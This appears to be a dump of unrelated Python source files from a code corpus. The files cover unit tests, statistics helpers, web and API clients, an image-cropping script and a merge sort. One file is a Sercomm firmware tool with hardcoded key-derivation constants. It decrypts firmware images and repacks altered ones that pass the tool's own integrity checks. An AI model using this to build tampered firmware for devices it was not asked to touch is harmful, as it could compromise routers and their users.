assert make_predicate["p2"] > make_predicate["p2_no_truth"]
def test_predicate_cannot_imply_factor(self, make_predicate, watt_factor):
assert not make_predicate["p7_true"] > watt_factor["f7"]
def test_implication_due_to_dates(self):
copyright_date_range = Comparison(
content="the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
copyright_date_specific = Comparison(
content="the date when $work was created was",
sign="=",
expression=date(1980, 6, 20),
)
assert copyright_date_specific.implies(copyright_date_range)
class TestContradiction:
def test_predicate_no_contradictions(self, make_predicate):
assert not make_predicate["p7"].contradicts(make_predicate["p7_true"])
assert not make_predicate["p1"].contradicts(make_predicate["p1_again"])
assert not make_predicate["p3"].contradicts(make_predicate["p7"])
def test_contradiction_by_exact(self, make_predicate):
assert make_predicate["p8_exact"].contradicts(make_predicate["p8_less"])
def test_contradiction_of_exact(self, make_predicate):
assert make_predicate["p8_less"].contradicts(make_predicate["p8_exact"])
def test_contradiction_by_equal_quantity(self, make_predicate):
assert make_predicate["p_quantity=3"].contradicts(
make_predicate["p_quantity>5"]
)
def test_contradiction_of_equal_quantity(self, make_predicate):
assert make_predicate["p_quantity>5"].contradicts(
make_predicate["p_quantity=3"]
)
def test_no_contradiction_by_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>=4"].contradicts(
make_predicate["p_quantity>5"]
)
def test_no_contradiction_of_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>5"].contradicts(
make_predicate["p_quantity>=4"]
)
def test_error_predicate_contradict_factor(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p7_true"].contradicts(watt_factor["f7"])
def test_no_contradiction_with_no_truth_value(self, make_predicate):
assert not make_predicate["p2_no_truth"].contradicts(make_predicate["p2"])
assert not make_predicate["p2"].contradicts(make_predicate["p2_no_truth"])
def test_no_contradiction_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"].contradicts(make_predicate["p9_acres"])
assert not make_predicate["p9_acres"].contradicts(make_predicate["p9"])
def test_contradiction_with_quantity(self, make_predicate):
assert make_predicate["p8_less"].contradicts(make_predicate["p8_meters"])
def test_contradictory_date_ranges(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression=date(1990, 1, 1),
)
assert later.contradicts(earlier)
assert earlier.contradicts(later)
def test_no_contradiction_without_truth_value(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
truth=None,
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression=date(1990, 1, 1),
)
assert not later.contradicts(earlier)
assert not earlier.contradicts(later)
def test_no_contradiction_date_and_time_period(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression="2000 years",
)
assert not later.contradicts(earlier)
assert not earlier.contradicts(later)
def test_no_contradiction_irrelevant_quantities(self):
more_cows = Comparison(
content="the number of cows $person owned was",
sign=">",
expression=10,
)
fewer_horses = Comparison(
content="the number of horses $person owned was",
sign="<",
expression=3,
)
assert not more_cows.contradicts(fewer_horses)
assert not fewer_horses.contradicts(more_cows)
def test_no_contradiction_of_predicate(self):
more_cows = Comparison(
content="the number of cows $person owned was",
sign=">",
expression=10,
)
no_cows = Predicate(content="the number of cows $person owned was", truth=False)
assert not more_cows.contradicts(no_cows)
assert not no_cows.contradicts(more_cows)
class TestQuantities:
def test_does_not_exclude_other_quantity(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
comparison_opposite = Comparison(
content="the distance between $place1 and $place2 was",
sign="<",
expression=Q_("30 miles"),
)
assert not comparison.contradicts(comparison_opposite)
def test_convert_quantity_of_Comparison(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
comparison_km = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("30 kilometers"),
)
assert comparison > comparison_km
def test_quantity_comparison_to_predicate(self):
distance = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression="20 miles",
)
predicate = Predicate(content="the distance between $place1 and $place2 was")
assert not distance >= predicate
|
62033
|
from copy import deepcopy
from hashlib import sha256
import os
import unittest
from google.protobuf.timestamp_pb2 import Timestamp
from blindai.pb.securedexchange_pb2 import (
Payload,
)
from blindai.client import (
RunModelResponse,
UploadModelResponse,
)
from blindai.dcap_attestation import Policy
from blindai.utils.errors import SignatureError, AttestationError
from .covidnet import get_input, get_model
exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof")
exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof")
tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof")
policy_file = os.path.join(os.path.dirname(__file__), "policy.toml")
class TestProof(unittest.TestCase):
def test_parse_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
self.assertTrue(response.is_signed())
response2 = RunModelResponse()
with open(exec_run, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
self.assertEqual(response.output, response2.output)
response3 = RunModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
self.assertEqual(response.output, response3.output)
response3.save_to_file(tmp_path)
response4 = RunModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
self.assertEqual(response.output, response4.output)
def test_parse_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
self.assertTrue(response.is_signed())
response2 = UploadModelResponse()
with open(exec_upload, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
response3 = UploadModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
response3.save_to_file(tmp_path)
response4 = UploadModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
def test_validate_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
policy = Policy.from_file(policy_file)
response.validate(
get_input(),
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.run_model_payload.output[0] += 0.1
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Input validation
response2 = deepcopy(response)
data = deepcopy(get_input())
data[4] += 1
with self.assertRaises(SignatureError):
response2.validate(
data,
policy=policy,
)
# Using file
response.validate(
get_input(),
policy_file=policy_file,
)
def test_validate_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
policy = Policy.from_file(policy_file)
model_hash = sha256(get_model()).digest()
response.validate(
model_hash,
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.send_model_payload.model_hash = (
b"1" + payload.send_model_payload.model_hash[1:]
)
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Input validation
response2 = deepcopy(response)
new_hash = model_hash[:5] + b"1" + model_hash[6:]
with self.assertRaises(SignatureError):
response2.validate(
new_hash,
policy=policy,
)
# Using file
response.validate(
model_hash,
policy_file=policy_file,
)
|
62036
|
from setuptools import find_packages, setup
PACKAGE_NAME = "up-bank-api"
VERSION = "0.3.2"
PROJECT_URL = "https://github.com/jcwillox/up-bank-api"
PROJECT_AUTHOR = "<NAME>"
DOWNLOAD_URL = f"{PROJECT_URL}/archive/{VERSION}.zip"
PACKAGES = find_packages()
with open("README.md", "r", encoding="UTF-8") as file:
LONG_DESCRIPTION = file.read()
if __name__ == "__main__":
setup(
name=PACKAGE_NAME,
version=VERSION,
url=PROJECT_URL,
download_url=DOWNLOAD_URL,
author=PROJECT_AUTHOR,
author_email="",
packages=PACKAGES,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
python_requires=">=3.7",
install_requires=["requests>=2.14.0"],
classifiers=[
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
62075
|
import numpy as np
from scipy.stats import binom
# import modules needed for logging
import logging
import os
logger = logging.getLogger(__name__) # module logger
def cummin(x):
"""A python implementation of the cummin function in R"""
for i in range(1, len(x)):
if x[i-1] < x[i]:
x[i] = x[i-1]
return x
def bh_fdr(pval):
"""A python implementation of the Benjamani-Hochberg FDR method.
This code should always give precisely the same answer as using
p.adjust(pval, method="BH") in R.
Parameters
----------
pval : list or array
list/array of p-values
Returns
-------
pval_adj : np.array
        adjusted p-values according to the Benjamini-Hochberg method
"""
pval_array = np.array(pval)
sorted_order = np.argsort(pval_array)
original_order = np.argsort(sorted_order)
pval_array = pval_array[sorted_order]
# calculate the needed alpha
n = float(len(pval))
pval_adj = np.zeros(int(n))
i = np.arange(1, n+1, dtype=float)[::-1] # largest to smallest
pval_adj = np.minimum(1, cummin(n/i * pval_array[::-1]))[::-1]
return pval_adj[original_order]
def frequency_test(mut_of_interest,
total_mut,
residues_of_interest,
residues_at_risk):
"""Perform a binomial test on the frequency of missense mutations within
given pre-defined residues within the gene.
Parameters
----------
mut_of_interest : {list, np.array}
number of mutations that are deemed "of interest"
total_mut : {list, np.array}
total number of mutations
residues_of_interest : {list, np.array}
contains the number of residues of interest for a mutation.
residues_at_risk : {list, np.array}
contains the number of residues at risk for a mutation.
Returns
-------
p_values : np.array
p-value for each gene for binomial test
"""
# initialize input
p_values = np.zeros(len(mut_of_interest))
mut = np.asarray(mut_of_interest)
N = np.asarray(total_mut)
residues_of_interest = np.asarray(residues_of_interest)
residues_at_risk = np.asarray(residues_at_risk, dtype=float)
residues_at_risk[residues_at_risk==0] = np.nan # fill zeros to avoid divide by zero
# calculate the background probability of mutation occurring at
# the residues of interest
P = residues_of_interest.astype(float) / residues_at_risk
# iterate through each gene to calculate p-value
logger.info('Calculating binomial test p-values . . .')
for k in range(len(mut)):
if not np.isnan(P[k]):
p_val = binomial_test(mut[k], N[k], P[k])
else:
# catch case for nan element
p_val = 1.0
p_values[k] = p_val
logger.info('Finished calculating binomial test p-values.')
return p_values
def binomial_test(n, N, P):
"""Perform binomial test on the observed n being higher than expected.
    Specifically, N residues are at risk and n mutations occurred at the
    residues of interest. Given the background probability of a mutation at a
    specific residue, the p-value is calculated as the probability of
    observing n or more mutations. Since N is large and n is small,
    it is computationally more efficient to compute 1 - Pr(i <= n-1).
Parameters
----------
n : int
number of observed mutations
N : int
number of residues at risk
P : float
background probability that a mutation would occur at a single residue
Returns
-------
    pval : float
        p-value for the binomial test
"""
if n <= 0:
return 1.0
pval = binom.sf(n-1, N, P)
return pval
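# A minimal, hedged usage sketch for the functions above; the p-values and
# counts below are made-up illustration data, not from any real dataset.
if __name__ == '__main__':
    raw_pvals = [0.01, 0.04, 0.03, 0.20]
    print('BH-adjusted p-values:', bh_fdr(raw_pvals))
    # 5 of 100 total mutations hit the residues of interest, which cover 1%
    # of the residues at risk (background probability P = 0.01)
    print('binomial p-value:', binomial_test(5, 100, 0.01))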
|
62081
|
import io
from flask import (
Blueprint,
render_template,
abort,
current_app,
make_response
)
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
client = Blueprint('client', __name__, template_folder='templates', static_url_path='/static')
@client.route('/<int:points>', methods=['GET'])
def home(points):
title = current_app.config['TITLE']
plot = plot_points(points)
return render_template('index.html', title=title, plot=plot)
def plot_points(points):
"""Generate a plot with a varying number of randomly generated points
Args:
points (int): a number of points to plot
Returns: An svg plot with <points> data points
"""
# data for plotting
    data = np.random.rand(points, 2)
fig = Figure()
FigureCanvas(fig)
ax = fig.add_subplot(111)
ax.scatter(data[:,0], data[:,1])
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_title(f'There are {points} data points!')
ax.grid(True)
img = io.StringIO()
fig.savefig(img, format='svg')
#clip off the xml headers from the image
svg_img = '<svg' + img.getvalue().split('<svg')[1]
return svg_img
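# A minimal, hedged sketch of wiring this blueprint into an application. The
# Flask() instance and the TITLE value below are assumptions for illustration;
# the real project may use an application factory instead.
if __name__ == '__main__':
    from flask import Flask
    app = Flask(__name__)
    app.config['TITLE'] = 'Random points demo'
    app.register_blueprint(client)
    # e.g. GET /50 renders index.html with an SVG scatter of 50 points
    app.run(debug=True)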
|
62104
|
from utils import *
from block_descriptor import *
from Crypto.Cipher import AES
import hashlib
import cStringIO
import gzip
import json
import gzip_mod
import os
class Image:
def __init__(self, image_data, read=True):
self.stream = cStringIO.StringIO(image_data)
self.stream_len = len(image_data)
if read:
self.readHeader()
def getBody(self):
cur_pos = self.stream.tell()
self.stream.seek(0xA0)
body = self.stream.read()
self.stream.seek(cur_pos)
return body
def readHeader(self):
        # Header size appears to be universally 0xA0 (160) bytes, with 32 bytes allotted per field.
raise Exception('readHeader not implemented for class %s!' % self.__class__.__name__)
def validateType(self):
raise Exception('No validateType implemented for class %s!' % self.__class__.__name__)
def getKeyPair(self):
raise Exception('No getKeyPair implemented for class %s' % self.__class__.__name__)
def decryptImage(self):
# Firmware images for Sercomm devices appear to universally use AES 256 in CBC mode.
if not hasattr(self, 'filesize'):
raise Exception('decryptImage called before readHeader!')
key_pair = self.getKeyPair()
aes = AES.new(key=key_pair['key'], mode=AES.MODE_CBC, IV=key_pair['iv'])
cur_pos = self.stream.tell()
# Seek past the header (remember, always 160 bytes!)
self.stream.seek(0xA0)
plaintext_body = aes.decrypt(self.stream.read())
return plaintext_body[:self.filesize]
class Stage2(Image):
def readHeader(self):
self.device_header = self.stream.read(128)
self.image_digest = self.stream.read(32)
self.blocks = []
def validateType(self):
if not hasattr(self, 'device_header'):
raise Exception('validateType called before readHeader!')
digest = hashlib.new('sha256')
digest.update(self.getBody())
return digest.digest() == self.image_digest
def extractHeader(self):
if not hasattr(self, 'device_header'):
raise Exception('extractHeader called before readHeader!')
try:
open('dev_hdr.bin', 'wb').write(self.device_header)
except IOError:
print('[-] Failed to write device header to file!')
def extractBlocks(self):
cur_pos = self.stream.tell()
self.stream.seek(0xA0)
gzip_stream = gzip.GzipFile(fileobj=self.stream, mode='rb')
while True:
block_name = unnullpad_str(gzip_stream.read(32))
if not block_name:
break
payload_size = int(unnullpad_str(gzip_stream.read(32)))
block_version = unnullpad_str(gzip_stream.read(32))
gzip_stream.read(32) # Padding?
try:
file_name = '%s_%s.bin' % (block_name, block_version)
open(file_name, 'wb').write(gzip_stream.read(payload_size))
self.blocks.append(BlockDescriptor(block_name, block_version, file_name))
print('[+] Wrote block %s version %s to file!' % (block_name, block_version))
except IOError:
print('[-] Failed to write block %s to file!' % block_name)
self.stream.seek(cur_pos)
def readManifest(self):
self.blocks = []
manifest_data = json.loads(open('manifest.json', 'rb').read())
if 'blocks' not in manifest_data:
raise Exception('Invalid firmware manifest provided!')
for block in manifest_data['blocks']:
self.blocks.append(BlockDescriptor(block['block_name'], block['block_version'], block['block_filename']))
def writeManifest(self):
block_manifests = []
for block in self.blocks:
block_manifests.append(block.asDict())
manifest_data = dict(blocks=block_manifests)
try:
open('manifest.json', 'wb').write(json.dumps(manifest_data))
except IOError:
print('[-] Failed to write manifest to file!')
def createImage(self):
self.stream = cStringIO.StringIO()
content_stream = cStringIO.StringIO()
gzip_wrapper = gzip_mod.GzipFile(filename = None, mode = 'wb', fileobj = content_stream, compresslevel = 6)
for block in self.blocks:
print('[+] Writing block with name %s and version %s to stream...' % (block.block_name, block.block_version))
gzip_wrapper.write(nullpad_str(block.block_name, 32))
gzip_wrapper.write(nullpad_str(str(os.path.getsize(block.block_filename)), 32))
gzip_wrapper.write(nullpad_str(block.block_version, 32))
gzip_wrapper.write('\x00' * 32) # Padding
gzip_wrapper.write(open(block.block_filename, 'rb').read())
gzip_wrapper.close()
content_stream.seek(0)
body_digest = hashlib.new('sha256')
body_digest.update(content_stream.read())
content_stream.seek(0)
self.stream.write(open('dev_hdr.bin', 'rb').read())
self.stream.write(body_digest.digest())
self.stream.write(content_stream.read())
self.stream.seek(0)
self.readHeader()
assert self.validateType() # Make sure we can pass our own validation checks
self.stream.seek(0)
return self.stream.read()
class Type1(Image):
def readHeader(self):
self.nullpad = self.stream.read(32)
self.fw_version = unnullpad_str(self.stream.read(32))
self.iv = self.stream.read(32)
self.nullpad2 = self.stream.read(32)
self.filesize = int(unnullpad_str(self.stream.read(32)))
assert self.stream.tell() == 0xA0
def validateType(self):
return self.nullpad == ('\x00' * 32) and self.nullpad2 == ('\x00' * 32)
def getKeyPair(self):
if not hasattr(self, 'fw_version'):
            raise Exception('getKeyPair called before readHeader!')
digest_1 = hashlib.new('md5')
digest_1.update(self.nullpad2)
digest_1.update(nullpad_str(self.fw_version, 32))
digest_2 = hashlib.new('md5')
digest_2.update(nullpad_str(str(self.filesize), 32))
digest_2.update(nullpad_str(self.fw_version, 32))
key = digest_1.digest() + digest_2.digest()
return dict(key=key, iv=self.iv[:16])
def createImage(self, fw_version, stage2_image):
self.stream = cStringIO.StringIO()
self.nullpad = '\x00' * 32
self.nullpad2 = '\x00' * 32
self.fw_version = fw_version
self.filesize = len(stage2_image)
self.iv = os.urandom(32)
image_key = self.getKeyPair()
aes = AES.new(key=image_key['key'], mode=AES.MODE_CBC, IV=image_key['iv'][:16]) # NB: Only the first 16 bytes are used
self.stream.write(self.nullpad) # Padding
self.stream.write(nullpad_str(self.fw_version, 32))
self.stream.write(self.iv)
self.stream.write(self.nullpad2) # More padding
self.stream.write(nullpad_str(str(self.filesize), 32))
self.stream.write(aes.encrypt(pkcs7_pad(stage2_image)))
self.stream.seek(0)
self.readHeader()
assert self.validateType()
self.stream.seek(0)
return self.stream.read()
class Type2(Image):
def readHeader(self):
self.image_digest = self.stream.read(32)
self.fw_version = unnullpad_str(self.stream.read(32))
self.key_factor = self.stream.read(32)
self.iv = self.stream.read(32)
self.filesize = int(unnullpad_str(self.stream.read(32)))
assert self.stream.tell() == 0xA0
def validateType(self):
if not hasattr(self, 'fw_version'):
raise Exception('validateType called before readHeader!')
cur_pos = self.stream.tell()
self.stream.seek(32) # Skip original image digest
digest = hashlib.new('sha256')
digest.update(('\x00' * 32) + self.stream.read())
self.stream.seek(cur_pos)
return digest.digest() == self.image_digest
@staticmethod
def keyPermutator(key):
perm_tbl = '26aejsw37bfktx48chmuy59dipvz'
key = bytearray(key)
for i in xrange(len(key)):
key[i] = perm_tbl[key[i] % len(perm_tbl)]
return str(key)
def getKeyPair(self):
digest_1 = hashlib.new('md5')
digest_1.update(self.key_factor)
digest_1.update(self.fw_version)
digest_2 = hashlib.new('md5')
digest_2.update('b7293e8150d1330c6c3d93f2fa81331b')
digest_2.update(self.fw_version)
digest_3 = hashlib.new('md5')
digest_3.update('83f323b7132703029da5f4a9daa72a60')
digest_3.update(self.fw_version)
digest_fin = hashlib.new('md5')
digest_fin.update(digest_1.digest())
digest_fin.update(digest_2.digest())
digest_fin.update(digest_3.digest())
key = Type2.keyPermutator(sercomm_hexdigest(digest_fin.digest()))
return dict(key=key, iv=self.iv[:16])
def createImage(self, fw_version, stage2_image):
self.stream = cStringIO.StringIO()
self.fw_version = fw_version
self.filesize = len(stage2_image)
self.key_factor = os.urandom(32)
#self.iv = os.urandom(32)
self.iv = '\x00' * 32
image_key = self.getKeyPair()
aes = AES.new(key=image_key['key'], mode=AES.MODE_CBC, IV=image_key['iv'][:16]) # NB: Only the first 16 bytes are used
self.stream.write('\x00' * 32) # Null digest for initial digest calculation
self.stream.write(nullpad_str(self.fw_version, 32))
self.stream.write(self.key_factor)
self.stream.write(self.iv)
self.stream.write(nullpad_str(str(self.filesize), 32))
self.stream.write(aes.encrypt(pkcs7_pad(stage2_image)))
self.stream.seek(0)
digest = hashlib.new('sha256')
digest.update(self.stream.read()) # Now overwrite it with the actual image digest
self.stream.seek(0)
self.stream.write(digest.digest())
self.stream.seek(0)
self.readHeader()
assert self.validateType()
self.stream.seek(0)
return self.stream.read()
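# A hedged usage sketch (Python 2, like the module above): decrypt a Type2
# outer image and extract the inner Stage2 blocks. 'firmware.bin' is a
# placeholder path used only for illustration, not a real sample.
if __name__ == '__main__':
    raw = open('firmware.bin', 'rb').read()
    outer = Type2(raw)
    if outer.validateType():
        stage2 = Stage2(outer.decryptImage())
        if stage2.validateType():
            stage2.extractHeader()
            stage2.extractBlocks()
            stage2.writeManifest()
        else:
            print('[-] Decrypted Stage2 digest mismatch (wrong key material?)')
    else:
        print('[-] Not a valid Type2 image!')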
|
62106
|
from .genoabc import AlleleContainer
from .alleles import Alleles
from .sparsealleles import SparseAlleles
from .chromosometemplate import ChromosomeTemplate, ChromosomeSet
from .labelledalleles import LabelledAlleles, InheritanceSpan, AncestralAllele
|
62147
|
from .exception import AuthFailedException
from .client import default_client
def init(client=default_client):
"""
Init configuration for SocketIO client.
Returns:
Event client that will be able to set listeners.
"""
from socketIO_client import SocketIO, BaseNamespace
from . import get_event_host
from gazu.client import make_auth_header
path = get_event_host(client)
event_client = SocketIO(path, None, headers=make_auth_header())
main_namespace = event_client.define(BaseNamespace, "/events")
event_client.main_namespace = main_namespace
event_client.on('error', connect_error)
return event_client
def connect_error(data):
print("The connection failed!")
return data
def add_listener(event_client, event_name, event_handler):
"""
Set a listener that reacts to a given event.
"""
event_client.main_namespace.on(event_name, event_handler)
return event_client
def run_client(event_client):
"""
Run event client (it blocks current thread). It listens to all events
configured.
"""
try:
event_client.wait()
except TypeError:
raise AuthFailedException
return event_client
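# A minimal, hedged usage sketch for the helpers above. The "task:update"
# event name and the handler body are illustrative assumptions only.
if __name__ == "__main__":
    def on_task_update(data):
        print("task updated:", data)
    event_client = init()
    add_listener(event_client, "task:update", on_task_update)
    run_client(event_client)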
|
62174
|
from datetime import datetime
import logging
from weconnect.addressable import AddressableAttribute, AddressableList
from weconnect.elements.generic_settings import GenericSettings
from weconnect.util import robustTimeParse
LOG = logging.getLogger("weconnect")
class ChargingProfiles(GenericSettings):
def __init__(
self,
vehicle,
parent,
statusId,
fromDict=None,
fixAPI=True,
):
self.profiles = AddressableList(localAddress='profiles', parent=self)
self.timeInCar = AddressableAttribute(localAddress='timeInCar', parent=self, value=None, valueType=datetime)
super().__init__(vehicle=vehicle, parent=parent, statusId=statusId, fromDict=fromDict, fixAPI=fixAPI)
def update(self, fromDict, ignoreAttributes=None):
ignoreAttributes = ignoreAttributes or []
LOG.debug('Update charging profiles from dict')
if 'value' in fromDict:
if 'profiles' in fromDict['value'] and fromDict['value']['profiles'] is not None:
for profile in fromDict['value']['profiles']:
LOG.warning('Charging profiles are not yet implemented %s', profile)
else:
self.profiles.clear()
self.profiles.enabled = False
if 'timeInCar' in fromDict['value']:
self.timeInCar.setValueWithCarTime(robustTimeParse(
fromDict['value']['timeInCar']), lastUpdateFromCar=None, fromServer=True)
else:
self.timeInCar.enabled = False
else:
self.profiles.clear()
self.profiles.enabled = False
self.timeInCar.enabled = False
super().update(fromDict=fromDict, ignoreAttributes=(ignoreAttributes + ['profiles', 'timeInCar']))
def __str__(self):
string = super().__str__()
if self.timeInCar.enabled:
string += f'\n\tTime in Car: {self.timeInCar.value.isoformat()}' # pylint: disable=no-member
string += f' (captured at {self.carCapturedTimestamp.value.isoformat()})' # pylint: disable=no-member
string += f'\n\tProfiles: {len(self.profiles)} items'
for profile in self.profiles:
string += f'\n\t\t{profile}'
return string
|
62213
|
import cv2 as cv
import numpy as np
from PIL import Image
import os
import time
import concurrent.futures
# Used for resizing: PIL's thumbnail() keeps the aspect ratio while fitting
# the image inside these bounds. My images were 5000 by 1000, so they get
# shrunk to 40 px tall (and therefore 200 px wide).
size = (1920, 40)
# only run on files with this file extension.
ext = '.jpeg'
# folder to run on.
path = os.getcwd()
startTime = 0
def get_boundaries(name, debug=False):
    # crop out unnecessary whitespace
src = cv.imread(cv.samples.findFile(name),1)
src_gray = cv.blur(src, (3,3))
threshold = 100
leftmost = src.shape[1]
rightmost = 0
canny_output = cv.Canny(src_gray, threshold, threshold * 2)
contours, _ = cv.findContours(canny_output, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
offset = int(src.shape[1]*0.03)
# Get the mass centers
mc = [None]*len(contours)
for i in range(len(contours)):
# Get the moment
moment = cv.moments(contours[i])
# add 1e-5 to avoid division by zero
mc[i] = (moment['m10'] / (moment['m00'] + 1e-5), moment['m01'] / (moment['m00'] + 1e-5))
# Draw contours
#minarea = 1000
for i, j in enumerate(contours):
val = int(mc[i][0])
area = cv.contourArea(contours[i])
#val = int(i[0][0][0])
if leftmost > val and val > offset:# and area > minarea:
leftmost = val
if rightmost < val and val < src.shape[1]-offset:# and area > minarea:
rightmost = val
if debug >= 2:
print('val: ',end='')
print(val, end = '')
print(' '.join(['Number', str(i), 'lm', str(leftmost),
'rm', str(rightmost)]))
leftmost -= offset
rightmost += offset
# Calculate the area with the moments 00 and compare with the result of the OpenCV function
if debug >= 3:
for i in range(len(contours)):
print(' * Contour[{0}]. Area: {1}. Length: {2}.'.format(i, cv.contourArea(contours[i]), cv.arcLength(contours[i], True), contours[i]))
return leftmost, 0, rightmost, src.shape[0]
def run_on(path, debug=False):
global startTime
startTime = int(time.time())
op = []
count = 0
namelist = []
for root, dirs, files in os.walk(path):
for name in files:
if ext in name:
namelist.append(name)
with concurrent.futures.ThreadPoolExecutor() as executor:
for name, result in zip(namelist, executor.map(get_boundaries, namelist)):
if debug >= 1: print('Time Elapsed:',
str(int(time.time())-startTime),
'secs. Image:', count, 'Name:', name)
shrink_and_crop(name, result, size, debug)
count+=1
print('Done in {} seconds!'.format(str(int(time.time())-startTime)))
def shrink_and_crop(name, cropbox, maxsize, debug=False):
im = Image.open(name)
if debug >= 2: print(im, cropbox)
try:
im = im.crop(cropbox)
if im.size[1] > maxsize[1]:
im.thumbnail(maxsize)
if debug >= 2: print(im)
im.save(name)
#im.save('did it work1.jpg')
except ValueError:
print('Did not run on:',name)
run_on(path, debug=1)
|
62219
|
from typing import List
class Solution:
def sortArray(self, nums: List[int]) -> List[int]:
temp = [0] * len(nums)
def mergeSort(start, end):
if start < end:
mid = (start + end) // 2
mergeSort(start, mid)
mergeSort(mid + 1, end)
i = k = start
j = mid + 1
while i <= mid:
while j <= end and nums[j] < nums[i]:
temp[k] = nums[j]
j += 1
k += 1
temp[k] = nums[i]
i += 1
k += 1
while j <= end:
temp[k] = nums[j]
j += 1
k += 1
nums[start: end + 1] = temp[start: end + 1]
mergeSort(0, len(nums) - 1)
return nums
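# A small, hedged driver for the merge sort above; LeetCode-style solutions
# normally ship without one, so this harness is illustrative only.
if __name__ == '__main__':
    assert Solution().sortArray([5, 2, 3, 1]) == [1, 2, 3, 5]
    assert Solution().sortArray([5, 1, 1, 2, 0, 0]) == [0, 0, 1, 1, 2, 5]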
|